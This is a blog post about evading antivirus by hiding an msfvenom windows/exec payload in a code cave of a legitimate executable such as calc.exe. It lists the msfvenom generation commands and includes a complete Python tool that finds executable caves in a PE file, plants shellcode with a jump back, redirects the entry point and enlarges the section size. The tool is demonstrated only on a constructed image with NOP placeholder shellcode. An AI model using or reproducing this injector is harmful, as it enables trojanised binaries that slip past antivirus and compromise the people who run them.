
Showing posts from August, 2022

Trojan exploiting CodeCaves for AV bypass

Interestingly, the windows/exec payload generated with msfvenom was not detected by well-known antivirus products such as McAfee, Kaspersky and Trend Micro when it was placed inside a legitimate executable such as calc.exe through a "code cave".

What is a code cave? A code cave is a region of an executable that is allocated but not used by the program: typically the zero-filled padding between the end of a section's real content and the section's file-alignment boundary. Because it is part of a section, it is mapped into memory along with the rest of the image, so shellcode written there adds no bytes to the file. If the section is executable, the payload can be run by pointing the entry point at the cave and jumping back to the original entry point afterwards.

The payload used here was generated as follows, once as a C array (to inspect the bytes) and once as raw bytes:

msfvenom -p windows/exec CMD=mspaint.exe EXITFUNC=thread -f c -o shellcode.bin
msfvenom -p windows/exec CMD=mspaint.exe EXITFUNC=thread -f raw -o <executable_name>.exe

PS 1: The Metasploit Framework is widely used and therefore well known to AV vendors.
PS 2: The shellcode generated by the framework was not obfuscated or modified in any way.
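The two steps the post glosses over, finding a cave and planting the payload in it, as an added example that is not part of the original post or of Metasploit: a small pure-Python PE parser lists zero-filled runs inside each section, then writes a payload plus a jmp back to the original entry point into the largest executable cave and redirects AddressOfEntryPoint to it. Everything it operates on is an assumption made for the demonstration: the PE image is constructed in memory (it is not calc.exe and cannot run), and PLACEHOLDER_SHELLCODE is a run of NOPs standing in for the msfvenom output.

```python
"""Locate code caves in a PE image and plant a stub in one (added example)."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
# Constructed stand-in for the msfvenom windows/exec bytes: 16 NOPs.
PLACEHOLDER_SHELLCODE = b"\x90" * 16


def parse_pe(pe):
    """Return (file offset of AddressOfEntryPoint, list of section dicts)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    num_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    opt = coff + 20
    sections = []
    for i in range(num_sections):
        off = opt + opt_size + i * 40          # 40-byte IMAGE_SECTION_HEADER entries
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        chars, = struct.unpack_from("<I", pe, off + 36)
        sections.append({"header_offset": off, "name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "rva": va, "raw_size": rawsize, "raw_ptr": rawptr,
                         "executable": bool(chars & IMAGE_SCN_MEM_EXECUTE)})
    return opt + 16, sections                  # AddressOfEntryPoint: same offset in PE32 and PE32+


def entry_point(pe):
    """AddressOfEntryPoint (an RVA) read from the optional header."""
    ep_field, _ = parse_pe(pe)
    return struct.unpack_from("<I", pe, ep_field)[0]


def find_code_caves(pe, min_size=64):
    """Zero-byte runs of at least min_size inside section raw data, with file
    offset, RVA after mapping, and whether the owning section is executable."""
    _, sections = parse_pe(pe)
    caves = []
    for s in sections:
        data = pe[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]] + b"\x01"  # sentinel closes a trailing run
        start = None
        for i, b in enumerate(data):
            if b == 0 and start is None:
                start = i
            elif b != 0 and start is not None:
                if i - start >= min_size:
                    caves.append({"section": s["name"], "file_offset": s["raw_ptr"] + start,
                                  "rva": s["rva"] + start, "size": i - start, "executable": s["executable"]})
                start = None
    return caves


def inject_into_cave(pe, shellcode):
    """Write shellcode + jmp back to the original entry point into the largest
    executable cave and redirect AddressOfEntryPoint there. Returns (image, cave_rva)."""
    ep_field, sections = parse_pe(pe)
    stub_len = len(shellcode) + 5               # 5 bytes for E9 rel32
    usable = [c for c in find_code_caves(pe, stub_len) if c["executable"]]
    if not usable:
        raise ValueError("no executable cave of %d bytes" % stub_len)
    cave = max(usable, key=lambda c: c["size"])
    patched = bytearray(pe)
    orig_ep, = struct.unpack_from("<I", patched, ep_field)
    rel = orig_ep - (cave["rva"] + stub_len)    # jmp rel32 is relative to the next instruction
    patched[cave["file_offset"]:cave["file_offset"] + stub_len] = bytes(shellcode) + b"\xE9" + struct.pack("<i", rel)
    struct.pack_into("<I", patched, ep_field, cave["rva"])
    # The loader only guarantees to map bytes inside VirtualSize: grow it over the stub if needed
    sec = next(s for s in sections if s["name"] == cave["section"])
    end = cave["file_offset"] - sec["raw_ptr"] + stub_len
    if end > sec["virtual_size"]:
        struct.pack_into("<I", patched, sec["header_offset"] + 8, end)
    return bytes(patched), cave["rva"]


def build_sample_pe():
    """Constructed, non-runnable PE32+ image: .text holds 64 bytes of fake code
    then a 448-byte cave; .data holds a 256-byte zero run (not executable)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                     # e_lfanew: PE header right after DOS header
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x22)  # x64, 2 sections, 240-byte optional header
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                     # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                   # AddressOfEntryPoint: start of .text
    struct.pack_into("<QII", opt, 24, 0x140000000, 0x1000, 0x200)  # ImageBase, SectionAlignment, FileAlignment

    def hdr(name, vsize, va, rawsize, rawptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, rawsize, rawptr, 0, 0, 0, 0, chars)

    headers = (dos + b"PE\0\0" + coff + opt
               + hdr(b".text", 0x40, 0x1000, 0x200, 0x200, 0x60000020)    # CODE | EXECUTE | READ
               + hdr(b".data", 0x200, 0x2000, 0x200, 0x400, 0xC0000040))  # INITIALIZED_DATA | READ | WRITE
    headers += b"\0" * (0x200 - len(headers))
    text = b"\xCC" * 0x40 + b"\0" * 0x1C0
    data = b"\x41" * 0x40 + b"\0" * 0x100 + b"\x42" * 0xC0
    return bytes(headers + text + data)
```

Pass the bytes of a real PE to find_code_caves to list its caves; on the constructed image it reports a 448-byte executable cave in .text at RVA 0x1040 and a 256-byte non-executable one in .data, and inject_into_cave uses only the former. Two details that matter in practice: the cave must be in an executable section, and VirtualSize has to be extended when the stub reaches past the section's declared content, otherwise the loader is not obliged to map those bytes. The jmp back is only reached if the payload returns control; a windows/exec payload built with EXITFUNC=thread ends by calling ExitThread instead, and a more careful stub would also save and restore registers around the payload.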